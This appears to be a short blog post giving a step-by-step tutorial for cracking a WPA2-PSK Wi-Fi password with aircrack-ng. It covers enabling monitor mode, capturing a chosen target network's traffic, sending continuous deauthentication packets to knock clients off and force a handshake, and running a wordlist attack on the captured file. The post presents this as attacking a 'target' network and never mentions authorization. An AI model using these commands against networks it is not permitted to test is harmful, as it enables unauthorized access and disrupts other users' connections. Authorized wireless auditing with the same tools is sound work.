Sunday, July 10, 2016

How to crack a wpa2-psk encrypted wifi password using aircrack-ng


 To crack a wpa2-psk encrypted wifi password using aircrack-ng






Requirements:

 1.Linux system with aircrack-ng install
  <if not have aircrack-ng install command " sudo apt-get install aircrack-ng ">
2.Word list comprising of all the possible different combination of pass-phrases
<For the Wordlist Check here >

Working:

1) open your linux terminal as sudo or root and type:
   ifconfig  <this will show you all the networking interfaces connected to your device>
2) now to start monitor mode type
 airmon-ng start wlan0
           >>> 'airmon-ng' is a traffic monitoring tool
             ‘wlan0’ is your wireless interface 


**after this commend we started the monitor mode as it's seen the monitor mode is working under wlan0mon , so this is your card name for now in the red area a list of process id’s that cause trouble during the process so kill those processes by typing
 kill <pid>
<pid>= all id of connected device
now type ifconfig and this will show the newly set monitoring interface i.e,   
                  wlan0mon




3) to show list of available WiFi network type
 airodump-ng wlan0
select your target and note its ‘bssid’ (bssid = base service set identifier) and channel then stop the capture using “cntrl+c“.

4) Start capturing the packets of your target network
   
type the following command 
airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0
    >>>i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 

this will start the capturing of packets. and if you get the handshake you wont need the aireplay command...
if you don't get the handshake yet while the capturing of packets goes on, open a new terminal as root and type

aireplay-ng -0 0 -a <bssid> mon0
aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
-0 = number associated for deauthentication,
0 = deauth count,
-a = bssid) here we are trying to send a deauthentication request.
In my case the command looks like

  aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0
after few seconds stop it using cntrl+c.
now after we have successful captured the wpa handshake


5) Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and files.

Select the file with “.cap“extension and type the following command
aircrack-ng -w <full location of the word list> <name of the file>
**aircrack-ng is a tool that helps in cracking the password
In my case the command looks like


aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
Now it starts finding suitable passphrase.

and now all you have to do is wait till you see the lovely news ( KEY Found 






0 comments:

Post a Comment